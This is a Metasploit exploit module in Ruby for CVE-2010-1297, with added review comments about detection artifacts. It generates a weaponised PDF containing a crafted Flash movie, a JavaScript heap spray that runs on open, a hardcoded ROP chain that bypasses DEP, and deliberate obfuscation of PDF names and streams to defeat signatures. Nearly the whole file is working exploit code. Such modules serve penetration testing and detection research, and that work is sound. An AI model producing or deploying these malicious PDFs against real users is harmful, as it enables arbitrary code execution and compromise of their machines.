Path: blob/master/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

# File-format module for CVE-2010-1297. It writes a PDF that embeds a pre-built
# SWF (data/exploits/CVE-2010-1297.swf) as a RichMedia annotation and carries an
# /OpenAction JavaScript heap spray. The PDF is written to disk through
# Msf::Exploit::FILEFORMAT; no payload handler is started
# ('DisablePayloadHandler' => true).
#
# Artifacts a detector can key on are noted on the methods below: the
# /OpenAction -> /JavaScript action, the /RichMedia annotation, '#xx'-escaped
# dictionary names (n_obfu), whitespace-padded ASCIIHex stream data
# (ascii_hex_whitespace_encode) and the fixed spray constants in make_js.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Module metadata. A single 'Automatic' target with an empty options hash is
  # declared; nothing target-specific is read elsewhere in this file.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
      'Description'    => %q{
          This module exploits a vulnerability in the DoABC tag handling within
        versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
        vulnerable, as are any other applications that may embed Flash player.

        Arbitrary code execution is achieved by embedding a specially crafted Flash
        movie into a PDF document. An AcroJS heap spray is used in order to ensure
        that the memory used by the invalid pointer issue is controlled.

        NOTE: This module uses a similar DEP bypass method to that used within the
        adobe_libtiff module. This method is unlikely to work across various
        Windows versions due a the hardcoded syscall number.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Found being openly exploited
          'jduck'    # Metasploit version
        ],
      'References'     =>
        [
          ['CVE', '2010-1297'],
          ['OSVDB', '65141'],
          ['BID', '40586'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
          # For SWF->PDF embedding
          ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
          # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          [ 'Automatic', { }],
        ],
      'DisclosureDate' => '2010-06-04',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
      ])
  end

  # Entry point: assemble the SWF bytes and the JavaScript, wrap both in a PDF
  # and write it to the file named by datastore['FILENAME'] via file_create
  # (provided by Msf::Exploit::FILEFORMAT).
  def exploit
    swf_data = make_swf()
    js_data = make_js(payload.encoded)

    # Create the pdf
    pdf = make_pdf(swf_data, js_data)

    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(pdf)
  end

  # Returns the bytes of the pre-built SWF shipped in the framework data
  # directory; the trigger lives in that file, not in this module.
  # NOTE(review): the handle is opened without a block or ensure, so an
  # exception raised by read leaves it open until GC; File.binread(path) would
  # be the block-free equivalent.
  def make_swf
    # load the static swf file
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf" )
    fd = File.open( path, "rb" )
    swf_data = fd.read(fd.stat.size)
    fd.close
    swf_data
  end

  # Builds the AcroJS heap-spray script. The sprayed block is stack_data (the
  # ret2lib chain below, packed as 32-bit little-endian words via pack('V*'))
  # followed by the encoded payload, %u-escaped with Rex::Text.to_unescape.
  # All JavaScript identifiers are random per run; the numeric constants are
  # not, and are the stable part of the artifact.
  #
  # @param encoded_payload [String] payload.encoded, passed in from #exploit
  # @return [String] JavaScript source placed in the /OpenAction action stream
  def make_js(encoded_payload)

    # The following executes a ret2lib using BIB.dll
    # The effect is to bypass DEP and execute the shellcode in an indirect way
    # Every gadget is an absolute 0x07...... address, so the chain presumes the
    # library is mapped at one fixed base; the description's "unlikely to work
    # across various Windows versions" caveat applies to these values as well.
    stack_data = [
      0xc0c0c0c,
      0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
      0xcccccccc,
      0x70048ef, # xchg eax,esp / ret
      0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
      0xcccccccc,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009033, # ret 0x18
      0x7009084, # ret
      0xc0c0c0c,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7001599, # pop ebp / ret
      0x10124,
      0x70072f7, # pop eax / ret
      0x10104,
      0x70015bb, # pop ecx / ret
      0x1000,
      0x700154d, # mov [eax], ecx / ret
      0x70015bb, # pop ecx / ret
      0x7ffe0300, # -- location of KiFastSystemCall
      0x7007fb2, # mov eax, [ecx] / ret
      0x70015bb, # pop ecx / ret
      0x10011,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70015bb, # pop ecx / ret
      0x10100,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70072f7, # pop eax / ret
      0x10011,
      0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
      0x7005c54, # pop esi / add esp,0x14 / ret
      0xffffffff,
      0x10100,
      0x0,
      0x10104,
      0x1000,
      0x40,
      # The next bit effectively copies data from the interleaved stack to the memory
      # pointed to by eax
      # The data copied is:
      # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
      # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
      # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x70015bb, # pop ecx / ret
      0x9054905a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5815eb5a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x18891a8b,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x8304c083,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xfb8104c2,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xc0c0c0c,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5ebee75,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xffffe6e8,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x909090ff,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90ffffff,
      0x700154d, # mov [eax], ecx / ret
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x700112f # call eax -- (execute stub to transition to full shellcode)
    ].pack('V*')

    # Identifier names are randomised per run (1..100 alphabetic characters), so
    # a signature keyed on variable names will not match two outputs of this
    # module; only the constants below are stable.
    var_unescape = rand_text_alpha(rand(100) + 1)
    var_shellcode = rand_text_alpha(rand(100) + 1)

    var_start = rand_text_alpha(rand(100) + 1)

    var_s = 0x10000 # size budget for one spray chunk; the script halves it for substring()
    var_c = rand_text_alpha(rand(100) + 1)
    var_b = rand_text_alpha(rand(100) + 1)
    var_d = rand_text_alpha(rand(100) + 1)
    var_3 = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(100) + 1)
    var_4 = rand_text_alpha(rand(100) + 1)

    # chain first, then the payload it hands control to
    payload_buf = ''
    payload_buf << stack_data
    payload_buf << encoded_payload

    escaped_payload = Rex::Text.to_unescape(payload_buf)

    # Fixed artifacts in the script: the "%u0c0c%u0c0c" filler (assembled from
    # single-character literals so the string never appears verbatim in the
    # file), 0x80000-character chunks, an array of 0x1f0 of them, and the
    # shellcode placed at offset (0x0c0c-0x24)/2 within each chunk. A detector
    # should evaluate or normalise the concatenations rather than grep for the
    # filler.
    js = %Q|
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
#{var_b} += #{var_shellcode};
#{var_b} += #{var_c};
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
var #{var_4} = new Array();
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
|

    js
  end

  # Returns +count+ random bytes, each in 0x80..0xFF (rand(128) + 128).
  # Only referenced from the commented-out binary-comment line in make_pdf,
  # so it is currently unused.
  #
  # @param count [Integer] number of bytes to generate
  # @return [String]
  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  # PDF indirect-object header, e.g. "7 0 obj\n" (generation 0 throughout).
  def io_def(id)
    "%d 0 obj\n" % id
  end

  # PDF indirect reference, e.g. "7 0 R".
  def io_ref(id)
    "%d 0 R" % id
  end


  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  # Rewrites roughly half (rand(2) == 0) of the ASCII letters in +str+ as PDF
  # name escapes ('#' plus two hex digits). Non-letters (`<<`, `/`, digits,
  # spaces, brackets) pass through, so the escapes land inside names such as
  # /Type/Catalog or /JavaScript — a parser has to normalise '#xx' before
  # matching on dictionary names.
  # The `and` keywords are safe here because no operand is an assignment, but
  # `&&` is the conventional form.
  # NOTE(review): /./u with unpack("C*")[0] only escapes the first byte of a
  # multi-byte character; every caller in this file passes ASCII.
  def n_obfu(str)
    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end


  # ASCIIHex-encodes +str+ with 1-3 random spaces between byte pairs (none
  # before the first) and appends the '>' end-of-data marker. ASCIIHexDecode
  # ignores whitespace, so the padding changes the file bytes without changing
  # what the viewer decodes — another per-file randomisation a signature must
  # remove (decode the stream before matching on its content).
  #
  # @param str [String] raw bytes to encode
  # @return [String] hex text ending in ">"
  def ascii_hex_whitespace_encode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end


  # Assembles the PDF: catalog -> pages -> one page with a single /RichMedia
  # annotation, an /OpenAction JavaScript action whose stream is
  # Flate(ASCIIHex(js)), and the SWF as an /EmbeddedFile reached through
  # RichMediaContent /Assets. Every dictionary fragment goes through n_obfu.
  # Object offsets are pushed onto +xref+ as each object is appended, so the
  # statement order here is the file layout — do not reorder.
  #
  # NOTE(review): object number 2 is never emitted, so the 15 offsets in xref
  # are labelled 1..15 by the "0 16" subsection header while the objects are
  # numbered 1 and 3..16: from object 3 on every entry is shifted by one and no
  # entry is labelled 16. Viewers that rebuild a damaged table will still open
  # the file (not verified here); an xref that disagrees with the objects is in
  # any case a common trait of generated malicious PDFs.
  # NOTE(review): in objects 12 and 13 swf_name is inside the string passed to
  # n_obfu, where '#xx' is not an escape within a literal string, so those two
  # names may differ from the /NM value written verbatim in object 7; whether
  # the viewer matches on them is not something this file shows.
  #
  # @param swf [String] SWF bytes (already compressed, stored as-is)
  # @param js [String] JavaScript source from make_js
  # @return [String] the complete PDF
  def make_pdf(swf, js)

    swf_name = rand_text_alpha(8 + rand(8)) + ".swf"

    xref = []
    eol = "\n"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%PDF-1.5" << eol
    #pdf << "%" << random_non_ascii_string(4) << eol

    # catalog
    xref << pdf.length
    pdf << io_def(1) << n_obfu("<</Type/Catalog")
    pdf << n_obfu("/Pages ") << io_ref(3)
    pdf << n_obfu("/OpenAction ") << io_ref(5)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # pages array
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj

    # page 1
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # js action (the /OpenAction target: runs on open, before any page interaction)
    xref << pdf.length
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj

    # js stream: the filter array is in decode order (inflate, then hex-decode),
    # the reverse of how the data is produced on the next line
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj

    # swf annotation object
    xref << pdf.length
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")
    pdf << n_obfu("/Rect [20 20 187 69] ")
    pdf << n_obfu("/RichMediaSettings ") << io_ref(8)
    pdf << n_obfu("/RichMediaContent ") << io_ref(9)
    pdf << n_obfu("/NM (") << swf_name << n_obfu(")")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media settings
    xref << pdf.length
    pdf << io_def(8)
    pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")
    pdf << n_obfu("/Activation ") << io_ref(10)
    pdf << n_obfu("/Deactivation ") << io_ref(11)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media content
    xref << pdf.length
    pdf << io_def(9)
    pdf << n_obfu("<</Type/RichMediaContent")
    pdf << n_obfu("/Assets ") << io_ref(12)
    pdf << n_obfu("/Configurations [") << io_ref(14) << "]"
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media activation / deactivation
    # /Condition/PO = activate on page open; /XD = deactivate on page close
    xref << pdf.length
    pdf << io_def(10)
    pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << io_def(11)
    pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")
    pdf << eol << endobj

    # rich media assets
    xref << pdf.length
    pdf << io_def(12)
    pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")
    pdf << eol << endobj

    # swf embeded file ref
    xref << pdf.length
    pdf << io_def(13)
    pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
    pdf << eol << endobj

    # rich media configuration
    xref << pdf.length
    pdf << io_def(14)
    pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")
    pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")
    pdf << eol << endobj

    # rich media isntance
    xref << pdf.length
    pdf << io_def(15)
    pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")
    pdf << n_obfu("/Asset ") << io_ref(13)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # swf stream
    # NOTE: This data is already compressed, no need to compress it again...
    # (no /Filter entry, so the SWF bytes are stored verbatim in the file)
    xref << pdf.length
    pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
    pdf << "stream" << eol
    pdf << swf << eol
    pdf << "endstream" << eol
    pdf << endobj

    # trailing stuff
    xrefPosition = pdf.length # byte offset of the "xref" keyword, written after startxref below
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    # each element is a byte offset, not an index; written as a 10-digit in-use entry
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << eol
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol

    pdf << "%%EOF" << eol

  end
end